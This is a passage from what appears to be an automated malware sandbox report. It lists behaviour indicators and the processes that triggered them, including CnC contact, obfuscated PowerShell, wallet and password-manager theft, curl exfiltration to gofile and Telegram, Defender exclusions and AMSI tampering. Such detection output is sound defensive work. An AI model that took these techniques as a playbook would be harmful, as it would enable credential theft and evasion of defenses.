      • zx.exe (PID: 16236)
      • q-AMD64-Windows.exe (PID: 10208)
      • gallery-dl.exe (PID: 21828)
      • darts-wled.exe (PID: 21632)
      • darts-pixelit.exe (PID: 8264)
      • Vector-fixer-v1.4.2.exe (PID: 23524)
      • IcarusLite-v1.1.13-win.exe (PID: 22824)
    • Creates FileSystem object to access computer's file system (SCRIPT)

      • wscript.exe (PID: 8396)
      • wscript.exe (PID: 8404)
      • wscript.exe (PID: 8668)
    • Possible Social Engineering Attempted

      • svchost.exe (PID: 2232)
    • Contacting a server suspected of hosting an CnC

      • svchost.exe (PID: 2232)
      • VIolet.exe (PID: 8480)
      • he.exe (PID: 7196)
      • hey.exe (PID: 8448)
      • WerFault.exe (PID: 13848)
      • bsg.exe (PID: 17228)
    • Gets full path of the running script (SCRIPT)

      • wscript.exe (PID: 8404)
      • wscript.exe (PID: 8668)
    • Writes binary data to a Stream object (SCRIPT)

      • wscript.exe (PID: 8396)
    • Contacting a server suspected of hosting an Exploit Kit

      • main.exe (PID: 8072)
      • svchost.exe (PID: 2232)
    • Usage of PowerShell observed

      • main.exe (PID: 8072)
    • Downloads file from URI via Powershell

      • powershell.exe (PID: 8988)
      • powershell.exe (PID: 21484)
    • Probably obfuscated PowerShell command line is found

      • wscript.exe (PID: 8404)
      • wscript.exe (PID: 8668)
      • cmd.exe (PID: 8440)
    • Obfuscation pattern (POWERSHELL)

      • powershell.exe (PID: 9088)
      • powershell.exe (PID: 9208)
      • powershell.exe (PID: 31576)
      • powershell.exe (PID: 5968)
    • Runs shell command (SCRIPT)

      • wscript.exe (PID: 8404)
      • wscript.exe (PID: 8668)
      • mshta.exe (PID: 12000)
      • wscript.exe (PID: 19572)
      • wscript.exe (PID: 31004)
    • Accesses current user name via WMI (SCRIPT)

      • wscript.exe (PID: 8404)
      • wscript.exe (PID: 8668)
    • Executing commands from a ".bat" file

      • main.exe (PID: 8072)
      • Bugsoft.exe (PID: 10540)
      • WannaCry.exe (PID: 14000)
      • yc.exe (PID: 11436)
      • G7_Update.exe (PID: 14380)
      • cmd.exe (PID: 14972)
      • RDPW_Installer.exe (PID: 10824)
      • cmd.exe (PID: 12500)
      • Serials_Checker.exe (PID: 12488)
      • Printer_Driver_SSL_support_v43.22.209.99.exe (PID: 18932)
      • powershell.exe (PID: 13912)
      • NanoCore_Portable.exe (PID: 12160)
      • wscript.exe (PID: 31004)
      • wscript.exe (PID: 31288)
    • Potential Corporate Privacy Violation

      • main.exe (PID: 8072)
      • xblkpfZ8Y4.exe (PID: 20608)
    • Starts process via Powershell

      • powershell.exe (PID: 9292)
      • powershell.exe (PID: 21484)
    • Base64-obfuscated command line is found

      • cmd.exe (PID: 8440)
      • cmd.exe (PID: 10108)
      • Pjibf.exe (PID: 8340)
      • cmd.exe (PID: 13800)
    • Uses REG/REGEDIT.EXE to modify or delete registry entries

      • main.exe (PID: 8072)
      • cmd.exe (PID: 14432)
      • cmd.exe (PID: 10452)
      • cmd.exe (PID: 24156)
      • nslookup.exe (PID: 22816)
    • The process executes files with name similar to system file names

      • main.exe (PID: 8072)
      • cmd.exe (PID: 14432)
      • steamcmd.exe (PID: 17580)
      • System.exe (PID: 26804)
      • steamcmd.exe (PID: 25744)
    • Uncommon PowerShell Invoke command executed

      • powershell.exe (PID: 10220)
      • powershell.exe (PID: 10748)
      • powershell.exe (PID: 14140)
      • powershell.exe (PID: 16224)
    • Using the short paths format

      • Bugsoft.exe (PID: 10540)
      • rod_en_1.exe (PID: 14016)
      • rxd_en_1.exe (PID: 14068)
      • REXCEL~1.EXE (PID: 15288)
      • RMO_SE~2.EXE (PID: 15232)
      • Taskmgr.exe (PID: 7876)
      • explorer.exe (PID: 4696)
      • NP6lceA4ayWl.exe (PID: 16292)
      • is-LLDTH.tmp (PID: 15832)
      • hAvav2N7QWPr.exe (PID: 16164)
      • main.exe (PID: 8072)
      • x64-setup.exe (PID: 17396)
      • ChilledWindows.GUI.exe (PID: 19688)
      • CHROMI~2.EXE (PID: 20216)
      • cmd.exe (PID: 11888)
      • L7XH7UR9695U.exe (PID: 14104)
      • conhost.exe (PID: 20008)
      • cfxre.exe (PID: 13372)
      • conhost.exe (PID: 19860)
      • HaoZipLoader.exe (PID: 22608)
      • rustdesk.exe (PID: 23012)
    • Creates file in the systems drive root

      • Prolin.exe (PID: 10772)
      • Axam.a.exe (PID: 10244)
      • Amus.exe (PID: 10812)
      • explorer.exe (PID: 4696)
      • Axam.exe (PID: 14780)
      • L7XH7UR9695U.exe (PID: 14104)
      • Axam.exe (PID: 17348)
      • attrib.exe (PID: 14908)
      • cmd.exe (PID: 10452)
      • 5252.exe (PID: 19368)
      • attrib.exe (PID: 19256)
      • conhost.exe (PID: 20008)
      • conhost.exe (PID: 19860)
      • PPTV(pplive)_forap_1084_9993.exe (PID: 14132)
      • Taskmgr.exe (PID: 7876)
      • %E8%87%AA%E5%8A%A8%E6%9B%B4%E6%96%B0%E8%BE%85%E5%8A%A9%E7%A8%8B%E5%BA%8F.exe (PID: 22700)
      • Axam.exe (PID: 22656)
      • Axam.exe (PID: 4116)
      • cfxre.exe (PID: 13372)
      • Axam.exe (PID: 12604)
      • Axam.exe (PID: 3100)
      • Axam.exe (PID: 21160)
      • Axam.exe (PID: 27576)
      • Axam.exe (PID: 25856)
      • Axam.exe (PID: 27264)
      • Axam.exe (PID: 27336)
      • FXServer.exe (PID: 17808)
      • Axam.exe (PID: 21548)
      • Axam.exe (PID: 29260)
      • Axam.exe (PID: 28572)
      • Axam.exe (PID: 19872)
      • Axam.exe (PID: 2988)
      • Axam.exe (PID: 20708)
      • Axam.exe (PID: 18852)
      • Axam.exe (PID: 29016)
      • Axam.exe (PID: 28848)
      • Axam.exe (PID: 21520)
      • Axam.exe (PID: 29900)
      • Axam.exe (PID: 24420)
      • Axam.exe (PID: 29492)
      • Axam.exe (PID: 31336)
      • Axam.exe (PID: 31656)
      • Axam.exe (PID: 31500)
      • Axam.exe (PID: 31360)
    • Reads the Windows owner or organization settings

      • pardufrigi_installer_1.0.p1.tmp (PID: 11184)
      • Pinaview.tmp (PID: 15548)
      • PrivacyPolicy.tmp (PID: 19896)
      • QiMiaoSetup.4.0.1.7.tmp (PID: 22504)
      • X空间.exe (PID: 23068)
    • Starts NET.EXE to display or manage information about active sessions

      • cmd.exe (PID: 10556)
      • net.exe (PID: 12184)
    • Malware-specific behavior (creating "System.dll" in Temp)

      • Rsvp_invite%23903388.exe (PID: 11212)
      • 37cqsj.exe (PID: 14052)
      • PPTV(pplive)_forap_1084_9993.exe (PID: 14132)
      • yx_dts.exe (PID: 19084)
      • sm.exe (PID: 19328)
      • teleport-assist-windows.exe (PID: 24604)
    • Suspicious use of NETSH.EXE

      • RuntimeBroker.exe (PID: 10116)
      • EdmsLauncher.exe (PID: 15280)
      • cssgo.exe (PID: 26244)
    • BASE64 encoded PowerShell command has been detected

      • cmd.exe (PID: 10108)
      • Pjibf.exe (PID: 8340)
      • cmd.exe (PID: 13800)
    • Starts a Microsoft application from unusual location

      • rod_en_1.exe (PID: 14016)
      • WannaCry.exe (PID: 14000)
      • L7XH7UR9695U.exe (PID: 14104)
      • rxd_en_1.exe (PID: 14068)
      • rmd_en_1.exe (PID: 14112)
      • bsg.exe (PID: 17228)
      • tlp.exe (PID: 15048)
      • NAMUVPN7.exe (PID: 17772)
      • namuvpnx2.exe (PID: 17684)
      • VC_redist.x64.exe (PID: 16856)
      • 4J8576A0E8V3.exe (PID: 18988)
      • 4J8576A0E8V3.exe (PID: 19024)
      • ChilledWindows.GUI.exe (PID: 19688)
      • !WannaDecryptor!.exe (PID: 6112)
      • Serials_Checker.exe (PID: 12488)
      • vc2005sp1redist_x86.exe (PID: 24976)
      • dxwebsetup.exe (PID: 18212)
      • dxwsetup.exe (PID: 26160)
      • VC_redist.x64.exe (PID: 23432)
    • The process bypasses the loading of PowerShell profile settings

      • Pjibf.exe (PID: 8340)
      • powershell.exe (PID: 8252)
      • better.exe (PID: 14008)
    • Adds/modifies Windows certificates

      • msiexec.exe (PID: 8928)
      • EdmsLauncher.exe (PID: 15280)
      • powershell.exe (PID: 10076)
      • msiexec.exe (PID: 22832)
      • HaoZipLoader.exe (PID: 22608)
      • certinst.exe (PID: 28708)
    • Changes the Home page of Internet Explorer

      • Amus.exe (PID: 10812)
    • Changes the title of the Internet Explorer window

      • Amus.exe (PID: 10812)
    • Mutex name with non-standard characters

      • 1.exe (PID: 14200)
      • 1.exe (PID: 14192)
      • windowsϵͳÖ÷¶¯·ÀÓù.exe (PID: 15732)
      • cfxre.exe (PID: 13372)
      • FXServer.exe (PID: 17808)
    • Starts itself from another location

      • CryptoLocker.exe (PID: 12936)
      • s287.exe (PID: 16184)
      • NP6lceA4ayWl.exe (PID: 16292)
      • System.exe (PID: 26804)
    • Access to an unwanted program domain was detected

      • %E7%BD%91%E6%98%93%E4%BA%91%E9%9F%B3%E4%B9%90.exe (PID: 12516)
    • Using short paths in the command line

      • rod_en_1.exe (PID: 14016)
      • rxd_en_1.exe (PID: 14068)
      • RMO_SE~2.EXE (PID: 15232)
      • ChilledWindows.GUI.exe (PID: 19688)
    • Starts application with an unusual extension

      • cmd.exe (PID: 14036)
      • 5252.exe (PID: 19368)
      • cmd.exe (PID: 19484)
      • taskmoder.exe (PID: 26396)
      • cmd.exe (PID: 15824)
      • cmd.exe (PID: 20372)
    • Checks for external IP

      • svchost.exe (PID: 14220)
      • svchost.exe (PID: 2232)
      • ksv.exe (PID: 16932)
      • mvc3.exe (PID: 7572)
      • bypass.exe (PID: 25216)
      • cssgo.exe (PID: 26244)
      • Client-built.exe (PID: 15792)
      • PLD06B.tmp (PID: 5696)
    • Uses NETSH.EXE to add a firewall rule or allowed programs

      • RuntimeBroker.exe (PID: 10116)
    • Uses base64 encoding (POWERSHELL)

      • powershell.exe (PID: 9208)
      • powershell.exe (PID: 11404)
      • powershell.exe (PID: 10092)
      • powershell.exe (PID: 10904)
      • powershell.exe (PID: 1972)
      • powershell.exe (PID: 28324)
    • Reads the BIOS version

      • Isass.exe (PID: 13720)
      • gertgherthre.exe (PID: 3448)
      • Isass.exe (PID: 18436)
      • 52.exe (PID: 19400)
      • hbvTmbP46IIEeHP1.exe (PID: 12260)
      • taskhostw.exe (PID: 13948)
    • Gets content of a file (POWERSHELL)

      • powershell.exe (PID: 9208)
    • Possible stealing from crypto wallets

      • L7XH7UR9695U.exe (PID: 14104)
      • conhost.exe (PID: 20008)
      • ksv.exe (PID: 16932)
      • conhost.exe (PID: 19860)
      • cvf.exe (PID: 20776)
      • mvc3.exe (PID: 7572)
      • bypass.exe (PID: 25216)
      • Pjibf.exe (PID: 8340)
      • bnkrigkawd.exe (PID: 26680)
    • Possible stealing from notes

      • L7XH7UR9695U.exe (PID: 14104)
      • conhost.exe (PID: 20008)
      • conhost.exe (PID: 19860)
    • Possible stealing from password managers

      • L7XH7UR9695U.exe (PID: 14104)
      • conhost.exe (PID: 20008)
      • conhost.exe (PID: 19860)
    • Executes as Windows Service

      • g64.exe (PID: 17160)
      • taskhostw.exe (PID: 13948)
      • FLServer.exe (PID: 26364)
      • VSSVC.exe (PID: 26360)
      • CagService.exe (PID: 25112)
    • The process verifies whether the antivirus software is installed

      • cmd.exe (PID: 11888)
      • offlinepackv4.exe (PID: 17852)
      • %E7%BD%91%E6%98%93%E4%BA%91%E9%9F%B3%E4%B9%90.exe (PID: 12516)
    • Creates new GUID (POWERSHELL)

      • CFXBypass.exe (PID: 4136)
      • powershell.exe (PID: 10092)
    • Browser headless start

      • chrome.exe (PID: 2164)
      • msedge.exe (PID: 14752)
      • firefox.exe (PID: 15664)
      • msedge.exe (PID: 10840)
      • firefox.exe (PID: 7412)
      • chrome.exe (PID: 19784)
      • chrome.exe (PID: 21316)
      • msedge.exe (PID: 20820)
      • firefox.exe (PID: 21496)
    • Uses TASKKILL.EXE to kill process

      • 2.exe (PID: 16308)
      • fastping_silent_v4.exe (PID: 17780)
      • %C3%83%C2%A5%C3%82%C2%A5%C3%82%C2%87%C3%83%C2%A5%C3%82%C2%A6%C3%82%C2%99%C3%83%25...~311~...%EF%BF%BD%C3%82%C2%A8_2_10004379.exe (PID: 13308)
      • cmd.exe (PID: 18520)
      • WannaCry.exe (PID: 14000)
      • rustdesk-1.2.3-2-x86_64.exe (PID: 15740)
      • cmd.exe (PID: 33140)
    • Starts the AutoIt3 executable file

      • main.exe (PID: 8072)
    • AUTOHOTKEY mutex has been found

      • giftorder.exe (PID: 18132)
    • OpenSSL has been detected (YARA)

      • main.exe (PID: 8072)
    • Reads command from file

      • cmd.exe (PID: 18960)
      • cmd.exe (PID: 19296)
    • Uses input redirection

      • lol11.exe (PID: 17596)
      • lol1.exe (PID: 17660)
    • Uses ATTRIB.EXE to modify file attributes

      • cmd.exe (PID: 10452)
    • Deletes a service using sc.exe

      • sc.exe (PID: 13172)
    • Windows service management via SC.EXE

      • sc.exe (PID: 13172)
      • sc.exe (PID: 19792)
      • sc.exe (PID: 24020)
      • sc.exe (PID: 27304)
      • sc.exe (PID: 20272)
      • sc.exe (PID: 28424)
      • sc.exe (PID: 11792)
      • sc.exe (PID: 26940)
      • sc.exe (PID: 17064)
    • Hides command output

      • cmd.exe (PID: 19484)
      • cmd.exe (PID: 20532)
      • cmd.exe (PID: 24320)
    • Drops 7-zip archiver for unpacking

      • Printer_Driver_SSL_support_v43.22.209.99.exe (PID: 18932)
    • PUTTY has been detected

      • putty.exe (PID: 19520)
    • CSC.EXE is used to compile C# code

      • csc.exe (PID: 19788)
      • csc.exe (PID: 10520)
      • csc.exe (PID: 24540)
      • csc.exe (PID: 27432)
    • Gets or sets the security protocol (POWERSHELL)

      • powershell.exe (PID: 10904)
      • powershell.exe (PID: 18896)
      • powershell.exe (PID: 12712)
    • Creates a new Windows service

      • sc.exe (PID: 20420)
    • Possible stealing of messenger data

      • ksv.exe (PID: 16932)
      • L7XH7UR9695U.exe (PID: 14104)
      • conhost.exe (PID: 20008)
      • mvc3.exe (PID: 7572)
      • conhost.exe (PID: 19860)
      • bypass.exe (PID: 25216)
      • bnkrigkawd.exe (PID: 26680)
    • Starts a new process with hidden mode (POWERSHELL)

      • powershell.exe (PID: 10084)
    • Drops a system driver (possible attempt to evade defenses)

      • sm.exe (PID: 19328)
      • 4.exe (PID: 12296)
    • Uses sleep to delay execution (POWERSHELL)

      • powershell.exe (PID: 10092)
    • Searches and executes a command on selected files

      • forfiles.exe (PID: 11736)
      • forfiles.exe (PID: 23984)
    • Uses TASKKILL.EXE to kill Browsers

      • cmd.exe (PID: 20532)
      • cmd.exe (PID: 24320)
    • Uses NSLOOKUP.EXE to check DNS info

      • cmd.exe (PID: 13656)
      • explorer.exe (PID: 4696)
      • cmd.exe (PID: 28792)
    • Possible stealing of VPN data

      • L7XH7UR9695U.exe (PID: 14104)
      • conhost.exe (PID: 20008)
      • conhost.exe (PID: 19860)
      • bypass.exe (PID: 25216)
    • Possible stealing of FTP data

      • L7XH7UR9695U.exe (PID: 14104)
      • conhost.exe (PID: 20008)
      • conhost.exe (PID: 19860)
      • bypass.exe (PID: 25216)
    • Drop NetSupport executable file

      • snd16061.exe (PID: 11732)
    • Manipulates environment variables

      • powershell.exe (PID: 22808)
      • powershell.exe (PID: 22928)
    • Adds exclusion path to Windows Defender (POWERSHELL)

      • explorer.exe (PID: 4696)
      • nslookup.exe (PID: 22816)
      • Vikings.exe (PID: 21892)
    • Script adds exclusion extension to Windows Defender

      • nslookup.exe (PID: 22816)
    • Changes AMSI initialization state that disables detection systems (POWERSHELL)

      • powershell.exe (PID: 10904)
    • Checks a user's role membership (POWERSHELL)

      • powershell.exe (PID: 10904)
    • Execution of CURL command

      • ksv.exe (PID: 16932)
      • cvf.exe (PID: 20776)
      • mvc3.exe (PID: 7572)
    • The process executes via Task Scheduler

      • server.exe (PID: 20324)
      • powershell.exe (PID: 31576)
      • powershell.exe (PID: 32412)
      • powershell.exe (PID: 5968)
      • Gxtuum.exe (PID: 33256)
      • Srfuhxm.exe (PID: 33276)
      • Gxtuum.exe (PID: 13108)
    • Executes application which crashes

      • powershell.exe (PID: 12492)
      • Pdf%20Reader.exe (PID: 13460)
      • justpoc.exe (PID: 25592)
    • Stops a currently running service

      • sc.exe (PID: 23996)
      • sc.exe (PID: 26860)
      • sc.exe (PID: 22056)
      • sc.exe (PID: 19708)
      • sc.exe (PID: 28328)
      • sc.exe (PID: 29480)
      • sc.exe (PID: 28884)
      • sc.exe (PID: 2164)
    • Runs PING.EXE to delay simulation

      • cmd.exe (PID: 20108)
    • Uses WMIC.EXE to obtain computer system information

      • cmd.exe (PID: 22396)
    • Uses CURL.EXE to exfiltrate files to gofile

      • cmd.exe (PID: 17288)
      • cmd.exe (PID: 25068)
      • cmd.exe (PID: 26700)
      • cmd.exe (PID: 2136)
      • cmd.exe (PID: 15724)
    • Creates/Modifies COM task schedule object

      • regsvr32.exe (PID: 9060)
      • HaoZipLoader.exe (PID: 22608)
    • Data upload via CURL

      • curl.exe (PID: 24340)
      • curl.exe (PID: 22404)
      • curl.exe (PID: 29980)
      • curl.exe (PID: 16128)
      • curl.exe (PID: 30708)
    • Uses CURL.EXE to exfiltrate files to Telegram Bot API

      • cmd.exe (PID: 23628)
      • cmd.exe (PID: 16148)
      • cmd.exe (PID: 33284)
    • Node.exe was dropped

      • steamcmd.exe (PID: 17580)
    • Possibly patching Antimalware Scan Interface function (YARA)

      • he.exe (PID: 7196)
    • The process checks if current user has admin rights

      • explorer.exe (PID: 4696)
    • Possible stealing of email data

      • bypass.exe (PID: 25216)
      • bnkrigkawd.exe (PID: 26680)
    • Loads DLL from Mozilla Firefox

      • bypass.exe (PID: 25216)
    • Suspicious power configuration changes

      • powercfg.exe (PID: 26004)
      • powercfg.exe (PID: 27600)
      • powercfg.exe (PID: 4956)
      • powercfg.exe (PID: 28100)
    • Uses powercfg.exe to modify the power settings

      • cmd.exe (PID: 22380)
    • Stops or disables Windows UPDATE services

      • sc.exe (PID: 26860)
      • sc.exe (PID: 22056)
      • sc.exe (PID: 19708)
      • sc.exe (PID: 28328)
      • sc.exe (PID: 28884)
    • Process copies executable file

      • cmd.exe (PID: 20108)
    • Query Microsoft Defender preferences

      • conhost.exe (PID: 18116)
    • Uses ICACLS.EXE to modify access control lists

      • X空间.exe (PID: 23068)
    • Searches for installed software

      • FLMgrTray.exe (PID: 28408)
      • svchost.exe (PID: 16868)
      • FLServer.exe (PID: 26364)
    • Creates new registry property (POWERSHELL)

      • powershell.exe (PID: 20704)
    • Uses WMIC.EXE to obtain BIOS management information

      • cmd.exe (PID: 24740)
    • File deletion via cmd.exe

      • cmd.exe (PID: 18784)
    • Starts CMD.EXE with AutoRun commands disabled

      • cmd.exe (PID: 18784)
    • Uses WMIC.EXE to obtain physical disk drive information

      • wscript.exe (PID: 19572)
    • Modifies hosts file to alter network resolution

      • taskmoder.exe (PID: 26396)
    • Uses NETSH.EXE to obtain data on the network

      • cssgo.exe (PID: 26244)
      • cmd.exe (PID: 15824)
      • cmd.exe (PID: 20372)
    • Uses CHOICE.EXE to delay execution

      • cmd.exe (PID: 18784)
    • Connects to SMTP port

      • tlp.exe (PID: 15048)
    • Reads Microsoft Outlook installation path

      • AvamarConsoleMultiple-windows-x86_64-7.2.1-32.exe (PID: 24692)
      • cqsj.exe (PID: 7288)
      • dts.exe (PID: 29504)
      • AutoUpdate.exe (PID: 27056)
    • The executable file from the user directory is run by the CMD process

      • 7z.exe (PID: 31276)
      • 7z.exe (PID: 33432)
      • NanoCore.exe (PID: 21264)
    • Creates files in the driver directory

      • taskmoder.exe (PID: 26396)
    • Invokes assembly entry point (POWERSHELL)

      • powershell.exe (PID: 31576)
      • powershell.exe (PID: 32412)
      • powershell.exe (PID: 5968)
    • ASCII char obfuscation (POWERSHELL)

      • powershell.exe (PID: 31576)
      • powershell.exe (PID: 32412)
      • powershell.exe (PID: 5968)
    • Reads Internet Explorer settings

      • AvamarConsoleMultiple-windows-x86_64-7.2.1-32.exe (PID: 24692)
      • cqsj.exe (PID: 7288)
      • dts.exe (PID: 29504)
    • Possible stealing from browsers

      • bnkrigkawd.exe (PID: 26680)
    • Uses TIMEOUT.EXE to delay execution

      • cmd.exe (PID: 18520)
      • cmd.exe (PID: 29128)
    • Uses RUNDLL32.EXE to run a file without a DLL extension

      • rundll32.exe (PID: 5940)
      • rundll32.exe (PID: 20548)
    • Uses WMIC.EXE to obtain operating system information

      • cmd.exe (PID: 22396)
    • Uses WMIC.EXE to obtain Windows Installer data

      • cmd.exe (PID: 24740)
    • Reads data from a binary Stream object (SCRIPT)

      • wscript.exe (PID: 19572)
  • INFO

    • Reads security settings of Internet Explorer

      • explorer.exe (PID: 4696)
      • Taskmgr.exe (PID: 7876)
      • bot_x64.exe (PID: 508)
      • Silentum_Spoofer.exe (PID: 2332)
      • CFXBypass.exe (PID: 4136)
      • Silentum_Spoofer.exe (PID: 900)
      • Silentum_Spoofer.exe (PID: 7504)
      • CFXBypass.exe (PID: 7800)
      • beacon.exe (PID: 10704)
      • Amus.exe (PID: 10812)
      • 01.exe (PID: 12484)
      • LOIC.exe (PID: 12328)
      • LOIC.exe (PID: 12320)
      • Client.exe (PID: 10284)
      • msiexec.exe (PID: 8928)
      • build1.exe (PID: 12548)
      • HorionInjector.exe (PID: 10732)
      • svchost.exe (PID: 14220)
      • yc.exe (PID: 11436)
      • %D0%A4%D0%BE%D1%80%D0%BC%D0%B0%203%D0%9E%D0%A8%D0%91%D0%A0.exe (PID: 10880)
      • {34184A33-0407-212E-3300-09040709E2C2}.exe (PID: 14848)
      • G7_Update.exe (PID: 14380)
      • WerFault.exe (PID: 13848)
      • BootstrapperNew.exe (PID: 13084)
      • BootstrapperNew.exe (PID: 14300)
      • dllhost.exe (PID: 15076)
      • conhost.exe (PID: 18332)
      • cscript.exe (PID: 18100)
      • PPTV(pplive)_forap_1084_9993.exe (PID: 14132)
      • 1.exe (PID: 16212)
      • msiexec.exe (PID: 22832)
      • giftorder.exe (PID: 18132)
      • notepad.exe (PID: 19008)
      • NAMUVPN32.exe (PID: 18180)
      • msedge.exe (PID: 16628)
      • bmw_v1.7.exe (PID: 16888)
      • namu864.exe (PID: 16600)
      • cqsj.exe (PID: 16152)
      • 123123.exe (PID: 17928)
      • namuvpnxp.exe (PID: 19348)
      • conhost.exe (PID: 18116)
      • Server.exe (PID: 18108)
      • %E6%A2%A6%E5%B9%BB%E9%AD%94%E7%95%8C%E7%94%B5%E8%84%91%E7%AB%AF.exe (PID: 11148)
      • Printer_Driver_SSL_support_v43.22.209.99.exe (PID: 18932)
      • ClassTicket.exe (PID: 18140)
      • downloader.exe (PID: 18264)
      • ZJQPPAJN.exe (PID: 19452)
      • AutoIt3.exe (PID: 17604)
      • CritScript.exe (PID: 14976)
      • msiexec.exe (PID: 5700)
      • AvamarConsoleMultiple-windows-x86_64-7.2.1-32.exe (PID: 24692)
      • svchost.exe (PID: 16868)
      • !WannaDecryptor!.exe (PID: 6112)
      • FXServer.exe (PID: 17808)
      • IMG001.exe (PID: 21232)
      • msiexec.exe (PID: 20004)
      • msiexec.exe (PID: 24520)
      • assignment.exe (PID: 21224)
      • msiexec.exe (PID: 8220)
      • imgs.exe (PID: 19696)
      • snd16061.exe (PID: 11732)
      • yx_dts.exe (PID: 19084)
      • msiexec.exe (PID: 22080)
      • msiexec.exe (PID: 25572)
      • msiexec.exe (PID: 23808)
      • cqsj.exe (PID: 7288)
      • alphaTweaks.exe (PID: 10592)
      • NanoCore_Portable.exe (PID: 12160)
      • cabal.exe (PID: 14524)
      • msiexec.exe (PID: 26236)
      • 4.exe (PID: 12296)
      • WMIC.exe (PID: 24248)
      • AutoUpdate.exe (PID: 27056)
      • 444.exe (PID: 21096)
      • PLD06B.tmp (PID: 5696)
      • lol.exe (PID: 17576)
      • msiexec.exe (PID: 19264)
      • %E6%83%85%E6%84%BF%E6%80%80%E6%97%A7.exe (PID: 8432)
      • Agentnov.exe (PID: 17112)
      • HaoZipLoader.exe (PID: 22608)
      • LauncherLoader.exe (PID: 18792)
      • x834.exe (PID: 14060)
      • dts.exe (PID: 29504)
      • ZubovLekciya.exe (PID: 28084)
      • Ventrilo.exe (PID: 14120)
      • X空间.exe (PID: 23068)
      • dts.exe (PID: 14572)
      • FLServer.exe (PID: 26364)
      • TianSys(XP%E4%B8%93%E7%94%A8).exe (PID: 16884)
      • taskmoder.exe (PID: 26396)
      • WMIC.exe (PID: 12608)
      • justpoc.exe (PID: 25592)
      • Gui.exe (PID: 26328)
      • pfntjejghjsdkr.exe (PID: 17760)
      • XClient.exe (PID: 19376)
      • WMIC.exe (PID: 12648)
      • Srfuhxm.exe (PID: 33276)
      • RDPWInst.exe (PID: 23476)
    • The sample compiled with english language support

      • main.exe (PID: 6884)
      • main.exe (PID: 8072)
      • bot_x64.exe (PID: 508)
      • Qbix01.exe (PID: 8860)
      • Axam.a.exe (PID: 10244)
      • Prolin.exe (PID: 10772)
      • Rsvp_invite%23903388.exe (PID: 11212)
      • WannaCry.exe (PID: 14000)
      • Amus.exe (PID: 10812)
      • 1.exe (PID: 14192)
      • 1.exe (PID: 14200)
      • rod_en_1.exe (PID: 14016)
      • rmd_en_1.exe (PID: 14112)
      • RMO_SE~2.EXE (PID: 15232)
      • %E5%88%92%E5%AD%A6%E5%8F%B7V2--%E6%9E%81%E9%80%9F%E7%89%88.exe (PID: 14388)
      • setup.exe (PID: 15320)
      • ksv.exe (PID: 15800)
      • 2.exe (PID: 16308)
      • is-LLDTH.tmp (PID: 15832)
      • is-TSIJD.tmp (PID: 6092)
      • namu864.exe (PID: 16600)
      • ui.exe (PID: 17736)
      • Isass.exe (PID: 13720)
      • mvc3.exe (PID: 17696)
      • giftorder.exe (PID: 18132)
      • ZJQPPAJN.exe (PID: 19452)
      • Printer_Driver_SSL_support_v43.22.209.99.exe (PID: 18932)
      • RDPW_Installer.exe (PID: 10824)
      • sm.exe (PID: 19328)
      • zx.exe (PID: 16236)
      • snd16061.exe (PID: 11732)
      • NanoCore_Portable.exe (PID: 12160)
      • gallery-dl.exe (PID: 21828)
      • q-AMD64-Windows.exe (PID: 10208)
      • darts-pixelit.exe (PID: 8264)
      • darts-wled.exe (PID: 21632)
      • PPTV(pplive)_forap_1084_9993.exe (PID: 14132)
      • 4.exe (PID: 12296)
      • game.exe (PID: 10460)
      • Vector-fixer-v1.4.2.exe (PID: 23524)
      • steamcmd.exe (PID: 17580)
      • %C3%83%C2%A5%C3%82%C2%A5%C3%82%C2%87%C3%83%C2%A5%C3%82%C2%A6%C3%82%C2%99%C3%83%25...~311~...%EF%BF%BD%C3%82%C2%A8_2_10004379.exe (PID: 13308)
      • IcarusLite-v1.1.13-win.exe (PID: 22824)
    • Reads the computer name

      • main.exe (PID: 6884)
      • main.exe (PID: 8072)
      • bot_x64.exe (PID: 508)
      • Silentum_Spoofer.exe (PID: 900)
      • Silentum_Spoofer.exe (PID: 2332)
      • Silentum_Spoofer.exe (PID: 7504)
      • payload.exe (PID: 7096)
      • nk.exe (PID: 4480)
      • CFXBypass.exe (PID: 7800)
      • CFXBypass.exe (PID: 4136)
      • net_launcher.exe (PID: 5264)
      • he.exe (PID: 7196)
      • VIolet.exe (PID: 8480)
      • hey.exe (PID: 8448)
      • v38438.exe (PID: 8468)
      • Pjibf.exe (PID: 8340)
      • pro_payload.exe (PID: 8896)
      • Qbix01.exe (PID: 8860)
      • tXmCLyGO.exe (PID: 8996)
      • n743.exe (PID: 8800)
      • pardufrigi_installer_1.0.p1.exe (PID: 8556)
      • winvnc.exe (PID: 9988)
      • ClipAid-Pro.exe (PID: 10180)
      • Loader.exe (PID: 10276)
      • Bexitor%20Installer.exe (PID: 10232)
      • Client.exe (PID: 10284)
      • TempSpoofer.exe (PID: 10724)
      • HorionInjector.exe (PID: 10732)
      • Anap.a.exe (PID: 10716)
      • Amus.exe (PID: 10812)
      • beacon.exe (PID: 10704)
      • cummersMG.exe (PID: 11132)
      • pardufrigi_installer_1.0.p1.tmp (PID: 11184)
      • Bugsoft.exe (PID: 10540)
      • WxWorkMultiOpen.exe (PID: 10440)
      • WxWorkMultiOpen.exe (PID: 10156)
      • yc.exe (PID: 11436)
      • 01.exe (PID: 12484)
      • build1.exe (PID: 12548)
      • LOIC.exe (PID: 12320)
      • %E7%BD%91%E6%98%93%E4%BA%91%E9%9F%B3%E4%B9%90.exe (PID: 12516)
      • pieletJF_vm.exe (PID: 12568)
      • build.exe (PID: 14080)
      • 3yjehc7m.exe (PID: 12404)
      • x834.exe (PID: 14060)
      • Loader.exe (PID: 14328)
      • WannaCry.exe (PID: 14000)
      • pieletJF.exe (PID: 11500)
      • pk.exe (PID: 13368)
      • CryptoLocker.exe (PID: 12936)
      • %D0%A4%D0%BE%D1%80%D0%BC%D0%B0%203%D0%9E%D0%A8%D0%91%D0%A0.exe (PID: 10880)
      • L7XH7UR9695U.exe (PID: 14104)
      • rxd_en_1.exe (PID: 14068)
      • rod_en_1.exe (PID: 14016)
      • rmd_en_1.exe (PID: 14112)
      • 1.exe (PID: 14192)
      • 1.exe (PID: 14200)
      • PDFConverter_P2W154-zx-666.exe (PID: 14088)
      • Pinaview.exe (PID: 14984)
      • WxWorkMultiOpen.exe (PID: 14240)
      • {34184A33-0407-212E-3300-09040709E2C2}.exe (PID: 14848)
      • G7_Update.exe (PID: 14380)
      • EdmsLauncher.exe (PID: 15280)
      • WxWorkMultiOpen.exe (PID: 14416)
      • REXCEL~1.EXE (PID: 15288)
      • PPTV(pplive)_forap_1084_9993.exe (PID: 14132)
      • {34184A33-0407-212E-3300-09040709E2C2}.exe (PID: 15100)
      • 37cqsj.exe (PID: 14052)
      • Pulsar-Client.exe (PID: 15776)
